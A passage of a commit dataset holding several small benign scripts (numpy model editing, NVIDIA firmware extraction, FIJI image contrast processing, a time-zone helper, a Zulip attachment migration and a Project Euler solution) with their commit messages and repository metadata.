if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
|
2b801401f57fed8a794812d2f3cc737b243999dc
|
extract-nouveau-fw.py
|
extract-nouveau-fw.py
|
#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
Add temporary firmware extraction file
|
Add temporary firmware extraction file
|
Python
|
mit
|
NVIDIA/tegra-rootfs-scripts
|
Add temporary firmware extraction file
|
#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
<commit_before><commit_msg>Add temporary firmware extraction file<commit_after>
|
#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
Add temporary firmware extraction file#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
<commit_before><commit_msg>Add temporary firmware extraction file<commit_after>#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
|
1025b1d773b230e47633ec7c67d451adcd5ac957
|
src/convert_dir_to_CLAHE.py
|
src/convert_dir_to_CLAHE.py
|
#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
Add script to CLAHE images in a directory via FIJI
|
Add script to CLAHE images in a directory via FIJI
|
Python
|
mit
|
seung-lab/Julimaps,seung-lab/Julimaps
|
Add script to CLAHE images in a directory via FIJI
|
#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
<commit_before><commit_msg>Add script to CLAHE images in a directory via FIJI<commit_after>
|
#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
Add script to CLAHE images in a directory via FIJI#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
<commit_before><commit_msg>Add script to CLAHE images in a directory via FIJI<commit_after>#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
|
426cdc9a82be52dbe7602273faaf0b38fb87d7cd
|
hotline/common/time_zone.py
|
hotline/common/time_zone.py
|
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
Add function to get time and date based on time zone
|
Add function to get time and date based on time zone
|
Python
|
mit
|
wearhacks/hackathon_hotline
|
Add function to get time and date based on time zone
|
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
<commit_before><commit_msg>Add function to get time and date based on time zone<commit_after>
|
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
Add function to get time and date based on time zonefrom datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
<commit_before><commit_msg>Add function to get time and date based on time zone<commit_after>from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
|
4438a09b307e518daa059a79d9c1c1dec2ba013e
|
zerver/migrations/0041_create_attachments_for_old_messages.py
|
zerver/migrations/0041_create_attachments_for_old_messages.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
Add migration to create attachments for old uploads.
|
Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.
|
Python
|
apache-2.0
|
jackrzhang/zulip,andersk/zulip,zulip/zulip,mahim97/zulip,showell/zulip,hackerkid/zulip,punchagan/zulip,peguin40/zulip,jrowan/zulip,calvinleenyc/zulip,hackerkid/zulip,verma-varsha/zulip,TigorC/zulip,vikas-parashar/zulip,jphilipsen05/zulip,andersk/zulip,vabs22/zulip,andersk/zulip,paxapy/zulip,tommyip/zulip,hackerkid/zulip,Juanvulcano/zulip,ryanbackman/zulip,zacps/zulip,dhcrzf/zulip,sonali0901/zulip,zacps/zulip,SmartPeople/zulip,aakash-cr7/zulip,rishig/zulip,niftynei/zulip,jphilipsen05/zulip,Galexrt/zulip,timabbott/zulip,synicalsyntax/zulip,amyliu345/zulip,dattatreya303/zulip,j831/zulip,kou/zulip,rishig/zulip,brockwhittaker/zulip,aakash-cr7/zulip,verma-varsha/zulip,j831/zulip,SmartPeople/zulip,rht/zulip,jrowan/zulip,tommyip/zulip,kou/zulip,dawran6/zulip,Juanvulcano/zulip,shubhamdhama/zulip,brainwane/zulip,niftynei/zulip,isht3/zulip,dattatreya303/zulip,samatdav/zulip,TigorC/zulip,AZtheAsian/zulip,JPJPJPOPOP/zulip,eeshangarg/zulip,jrowan/zulip,vabs22/zulip,amyliu345/zulip,vaidap/zulip,Galexrt/zulip,arpith/zulip,susansls/zulip,peguin40/zulip,Juanvulcano/zulip,rishig/zulip,SmartPeople/zulip,Jianchun1/zulip,jackrzhang/zulip,punchagan/zulip,Jianchun1/zulip,jrowan/zulip,Diptanshu8/zulip,dawran6/zulip,blaze225/zulip,Diptanshu8/zulip,Diptanshu8/zulip,grave-w-grave/zulip,ryanbackman/zulip,rht/zulip,reyha/zulip,showell/zulip,rht/zulip,vabs22/zulip,ryanbackman/zulip,shubhamdhama/zulip,jrowan/zulip,PhilSk/zulip,vabs22/zulip,sharmaeklavya2/zulip,brainwane/zulip,PhilSk/zulip,PhilSk/zulip,vaidap/zulip,Jianchun1/zulip,punchagan/zulip,cosmicAsymmetry/zulip,andersk/zulip,Jianchun1/zulip,showell/zulip,JPJPJPOPOP/zulip,sharmaeklavya2/zulip,cosmicAsymmetry/zulip,vikas-parashar/zulip,susansls/zulip,amyliu345/zulip,sonali0901/zulip,dhcrzf/zulip,amanharitsh123/zulip,Galexrt/zulip,paxapy/zulip,mahim97/zulip,PhilSk/zulip,KingxBanana/zulip,aakash-cr7/zulip,dhcrzf/zulip,zacps/zulip,isht3/zulip,PhilSk/zulip,jackrzhang/zulip,dattatreya303/zulip,sonali0901/zulip,timabbott/zulip,JPJPJPOPOP/zulip,amanharitsh123/zulip,AZtheAsian/zulip,tommyip/zulip,vabs22/zulip,sharmaeklavya2/zulip,eeshangarg/zulip,aakash-cr7/zulip,showell/zulip,aakash-cr7/zulip,susansls/zulip,jackrzhang/zulip,zulip/zulip,arpith/zulip,souravbadami/zulip,timabbott/zulip,souravbadami/zulip,AZtheAsian/zulip,aakash-cr7/zulip,cosmicAsymmetry/zulip,KingxBanana/zulip,PhilSk/zulip,rht/zulip,dawran6/zulip,paxapy/zulip,reyha/zulip,dattatreya303/zulip,Galexrt/zulip,christi3k/zulip,samatdav/zulip,eeshangarg/zulip,vaidap/zulip,souravbadami/zulip,j831/zulip,kou/zulip,synicalsyntax/zulip,verma-varsha/zulip,paxapy/zulip,reyha/zulip,KingxBanana/zulip,hackerkid/zulip,hackerkid/zulip,brockwhittaker/zulip,ryanbackman/zulip,timabbott/zulip,isht3/zulip,rishig/zulip,sonali0901/zulip,shubhamdhama/zulip,niftynei/zulip,samatdav/zulip,verma-varsha/zulip,tommyip/zulip,andersk/zulip,vikas-parashar/zulip,tommyip/zulip,vaidap/zulip,christi3k/zulip,andersk/zulip,timabbott/zulip,zulip/zulip,blaze225/zulip,amanharitsh123/zulip,brockwhittaker/zulip,souravbadami/zulip,cosmicAsymmetry/zulip,brainwane/zulip,joyhchen/zulip,samatdav/zulip,arpith/zulip,rht/zulip,TigorC/zulip,brainwane/zulip,brockwhittaker/zulip,Galexrt/zulip,mahim97/zulip,punchagan/zulip,arpith/zulip,joyhchen/zulip,jainayush975/zulip,souravbadami/zulip,AZtheAsian/zulip,dattatreya303/zulip,vabs22/zulip,amanharitsh123/zulip,calvinleenyc/zulip,punchagan/zulip,verma-varsha/zulip,dawran6/zulip,joyhchen/zulip,rht/zulip,grave-w-grave/zulip,peguin40/zulip,joyhchen/zulip,christi3k/zulip,dattatreya303/zulip,verma-varsha/zulip,vikas-parashar/zulip,Diptanshu8/zulip,Juanvulcano/zulip,brockwhittaker/zulip,christi3k/zulip,reyha/zulip,KingxBanana/zulip,calvinleenyc/zulip,cosmicAsymmetry/zulip,showell/zulip,j831/zulip,dhcrzf/zulip,souravbadami/zulip,zulip/zulip,dawran6/zulip,sonali0901/zulip,SmartPeople/zulip,rishig/zulip,susansls/zulip,TigorC/zulip,joyhchen/zulip,timabbott/zulip,JPJPJPOPOP/zulip,jphilipsen05/zulip,rishig/zulip,jphilipsen05/zulip,samatdav/zulip,Juanvulcano/zulip,zacps/zulip,jainayush975/zulip,paxapy/zulip,rht/zulip,dhcrzf/zulip,zacps/zulip,SmartPeople/zulip,synicalsyntax/zulip,Jianchun1/zulip,andersk/zulip,jainayush975/zulip,jphilipsen05/zulip,sharmaeklavya2/zulip,kou/zulip,joyhchen/zulip,sharmaeklavya2/zulip,isht3/zulip,grave-w-grave/zulip,jainayush975/zulip,vaidap/zulip,shubhamdhama/zulip,AZtheAsian/zulip,TigorC/zulip,synicalsyntax/zulip,arpith/zulip,calvinleenyc/zulip,shubhamdhama/zulip,vaidap/zulip,timabbott/zulip,eeshangarg/zulip,rishig/zulip,niftynei/zulip,zulip/zulip,blaze225/zulip,showell/zulip,kou/zulip,shubhamdhama/zulip,kou/zulip,synicalsyntax/zulip,niftynei/zulip,brainwane/zulip,reyha/zulip,jackrzhang/zulip,amanharitsh123/zulip,j831/zulip,hackerkid/zulip,showell/zulip,Diptanshu8/zulip,brainwane/zulip,mahim97/zulip,synicalsyntax/zulip,shubhamdhama/zulip,jackrzhang/zulip,susansls/zulip,grave-w-grave/zulip,eeshangarg/zulip,AZtheAsian/zulip,tommyip/zulip,vikas-parashar/zulip,calvinleenyc/zulip,zacps/zulip,ryanbackman/zulip,grave-w-grave/zulip,Galexrt/zulip,tommyip/zulip,paxapy/zulip,mahim97/zulip,JPJPJPOPOP/zulip,jainayush975/zulip,brockwhittaker/zulip,amyliu345/zulip,amyliu345/zulip,jackrzhang/zulip,christi3k/zulip,blaze225/zulip,jainayush975/zulip,dawran6/zulip,eeshangarg/zulip,KingxBanana/zulip,peguin40/zulip,punchagan/zulip,samatdav/zulip,zulip/zulip,KingxBanana/zulip,arpith/zulip,Jianchun1/zulip,eeshangarg/zulip,niftynei/zulip,hackerkid/zulip,mahim97/zulip,Galexrt/zulip,kou/zulip,SmartPeople/zulip,jphilipsen05/zulip,brainwane/zulip,amyliu345/zulip,Diptanshu8/zulip,blaze225/zulip,blaze225/zulip,j831/zulip,dhcrzf/zulip,vikas-parashar/zulip,Juanvulcano/zulip,calvinleenyc/zulip,reyha/zulip,synicalsyntax/zulip,sonali0901/zulip,peguin40/zulip,grave-w-grave/zulip,susansls/zulip,ryanbackman/zulip,punchagan/zulip,christi3k/zulip,peguin40/zulip,jrowan/zulip,JPJPJPOPOP/zulip,zulip/zulip,sharmaeklavya2/zulip,amanharitsh123/zulip,dhcrzf/zulip,isht3/zulip,isht3/zulip,TigorC/zulip,cosmicAsymmetry/zulip
|
Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
<commit_before><commit_msg>Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
<commit_before><commit_msg>Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
|
1f83170b2e97d8c8a20acdd20109e460b73a09dc
|
multiples-of-3-and-5/index.py
|
multiples-of-3-and-5/index.py
|
from __future__ import division
from math import ceil
from itertools import combinations
from operator import mul
# Sum of multiples of 3 or 5 under 1000, simplified:
# print (3 * 333 * 334 / 2) + (5 * 199 * 200 / 2) - (15 * 66 * 67 / 2)
def getSumOfMultiple(num, limit):
return int((ceil(limit / num) - 1) * ceil(limit / num) * num / 2)
def getSumOfMultiples(multiples, limit):
result = 0
sign = 1
for i in range(1, len(multiples) + 1):
for x in combinations(multiples, i):
result += sign * getSumOfMultiple(reduce(mul, x, 1), limit)
sign *= -1
return result
|
Add optimized multiples-of-3-and-5 in Python
|
Add optimized multiples-of-3-and-5 in Python
|
Python
|
mit
|
SterlingVix/code-problems,nickell-andrew/code-problems,jefimenko/code-problems,SterlingVix/code-problems,netuoso/code-problems,ockang/code-problems,jmera/code-problems,ranveer-git/code-problems,SterlingVix/code-problems,angelkar/code-problems,ockang/code-problems,marcoviappiani/code-problems,sisirkoppaka/code-problems,jefimenko/code-problems,cjjavellana/code-problems,sethdame/code-problems,marcoviappiani/code-problems,akaragkiozidis/code-problems,akaragkiozidis/code-problems,ankur-anand/code-problems,faruzzy/code-problems,saurabhjn76/code-problems,akaragkiozidis/code-problems,modulexcite/code-problems,diversedition/code-problems,jefimenko/code-problems,ranveer-git/code-problems,blakeembrey/code-problems,aloisdg/code-problems,blakeembrey/code-problems,jefimenko/code-problems,netuoso/code-problems,nickell-andrew/code-problems,Widea/code-problems,akaragkiozidis/code-problems,Widea/code-problems,blakeembrey/code-problems,AndrewKishino/code-problems,sethdame/code-problems,tahoeRobbo/code-problems,ankur-anand/code-problems,tahoeRobbo/code-problems,patrickford/code-problems,lgulliver/code-problems,hlan2/code-problems,rkho/code-problems,modulexcite/code-problems,caoglish/code-problems,caoglish/code-problems,akaragkiozidis/code-problems,diversedition/code-problems,faruzzy/code-problems,sethdame/code-problems,caoglish/code-problems,modulexcite/code-problems,cjjavellana/code-problems,aloisdg/code-problems,akaragkiozidis/code-problems,marcoviappiani/code-problems,ockang/code-problems,Widea/code-problems,SterlingVix/code-problems,blakeembrey/code-problems,netuoso/code-problems,ranveer-git/code-problems,Widea/code-problems,saurabhjn76/code-problems,ankur-anand/code-problems,sisirkoppaka/code-problems,aloisdg/code-problems,faruzzy/code-problems,angelkar/code-problems,nacho-gil/code-problems,AndrewKishino/code-problems,netuoso/code-problems,nacho-gil/code-problems,aloisdg/code-problems,hlan2/code-problems,patrickford/code-problems,hlan2/code-problems,tahoeRobbo/code-problems,hlan2/code-problems,hlan2/code-problems,dwatson3/code-problems,blakeembrey/code-problems,modulexcite/code-problems,dwatson3/code-problems,dwatson3/code-problems,cjjavellana/code-problems,lgulliver/code-problems,sisirkoppaka/code-problems,jefimenko/code-problems,BastinRobin/code-problems,netuoso/code-problems,ockang/code-problems,sisirkoppaka/code-problems,ockang/code-problems,tahoeRobbo/code-problems,saurabhjn76/code-problems,caoglish/code-problems,AndrewKishino/code-problems,dwatson3/code-problems,patrickford/code-problems,nacho-gil/code-problems,jmera/code-problems,rkho/code-problems,jmera/code-problems,faruzzy/code-problems,akaragkiozidis/code-problems,lgulliver/code-problems,marcoviappiani/code-problems,ranveer-git/code-problems,hlan2/code-problems,tahoeRobbo/code-problems,tahoeRobbo/code-problems,s